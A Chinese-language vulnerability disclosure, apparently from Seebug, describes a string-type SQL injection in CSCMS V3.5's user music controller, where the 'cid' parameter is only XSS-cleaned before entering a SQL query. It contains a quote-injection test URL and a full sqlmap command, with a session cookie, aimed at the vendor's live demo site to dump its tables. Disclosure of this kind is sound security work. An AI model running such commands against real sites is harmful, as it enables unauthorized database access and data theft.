### 简要描述:
CSCMS V3.5 最新版 存在着注射漏洞,已经在官方演示站证实 http://demo.chshcms.com/ 代码分析在 详细说明 中,实站演示在 漏洞证明中
### 详细说明:
/app/controllers/user/music.php line 16
```
public function index() //用户会员中心-音乐-我分享的-中文舞曲
{
$data='';
//下面几句使用了xss_clean,并不会过滤SQL注射字符,尤其是单引号
$yid = $this->security->xss_clean($this->input->get('yid', TRUE)); //yid,1为分享,2为待审核,3为回收站
$cid = $this->security->xss_clean($this->input->get('cid', TRUE)); //cid
$page = $this->security->xss_clean($this->input->get('page', TRUE)); //page
…………………………………略去若干行………………………………
if(!empty($page_arr) && !empty($page_arr[2])){
//下面语句没有问题
$sqlstr="select * from ".CS_SqlPrefix."dance where CS_User='".$this->session->userdata('cs_name')."'"; //这句还没有问题
if($yid==3){ //直接比较,很安全
$sqlstr.=" and cs_hid=1";//安全
}else{
$sqlstr.=" and cs_hid=0";//安全
}
if($yid==1 || $yid==2){ //安全
$yid=$yid-1; //安全
$sqlstr.=" and cs_yid='$yid'"; //安全
}
if($cid){ //cid直接XSS-clean拿来的
$sqlstr.=" and cs_cid='$cid'";
//用单引号包住是没有用的,因为你没有intval,用的是xss-clean,所以是一个字符型注射
}
……………………以下省略…………………………
```
因此,注射点 为http://demo.chshcms.com/index.php/user/music?cid=1
类型:string(因为被单引号包起来了)
注:需注册用户并登陆
```
http://demo.chshcms.com/index.php/user/music?cid=1'
```
[<img src="https://images.seebug.org/upload/201312/30004113e46ed2be197ff82c2fa36b3a55e20400.png" alt="4.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/30004113e46ed2be197ff82c2fa36b3a55e20400.png)
### 漏洞证明:
下面以官方演示站进行测试(其实上面打个“ ' ”就已经证明问题了,为了证明其危害,还是要证明其可以获取全部数据库信息)
注册用户并登陆,使用SQLMAP+用户cookie
```
C:\Users\Administrator>sqlmap.py -u "http://demo.chshcms.com/index.php/user/music?cid=1" -p cid --dbms=mysql --cookie="cscms_cscms_session=Da%2BbjXSsVeKp%2FhhWorAah04ukW0CmpqdQWFEt%2FZYB%2BPTQq86NpxXi67qadig2AgchmmiQpS1AYsnWeW7J%2FKSfWqLXbkSoYARVkBhHcaRE%2FVhGwqf92O0%2F9W%2FoLWnx4G35qINDgqkyTe0g0LP5B6B48une0%2Bnk7Jde23X9wUTeUb%2Bws5kMlBies8kU1bITcGuHc%2BwGVbb3kYulG2wne3IboEVVd98PIasyT1rssVBpuaxttqKnbjJYIAnNiv3Zs4gCtI20iogyxhA2iiNZHID4KJLgjqrRPfLa%2F1tZgh6R8AWYMmKvfqtaLAcxlKbWplXt%2F4P03WDFnkc0rhN3067Yxsm35kgL4RMsOxjwsBMCtRK1cz7xe6r8oHzA4nMb%2FDVSqHlY5IIIS6WyzgFsRySjhWzwmg8Dj7%2F1D%2B2NjsHWglCy5CjsE%2B0JyKOvIZD1m1t8roTzo32o2rvnM69KKJI6Osn1d95HkuSuike5XxHyoIu%2FiGh3BniKm4mLnesq1yi" --tables
```
[<img src="https://images.seebug.org/upload/201312/3000464555cfa730752645578c60da9010f4becf.png" alt="00001.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/3000464555cfa730752645578c60da9010f4becf.png)
[<img src="https://images.seebug.org/upload/201312/30004654e84e6dca05b5a04def2f87aba26d92af.png" alt="00002.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/30004654e84e6dca05b5a04def2f87aba26d92af.png)
[<img src="https://images.seebug.org/upload/201312/3000470643845ca9b685e5673cfb6fb7eaadf482.png" alt="00003.PNG" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201312/3000470643845ca9b685e5673cfb6fb7eaadf482.png)
京公网安备 11010502034610号
暂无评论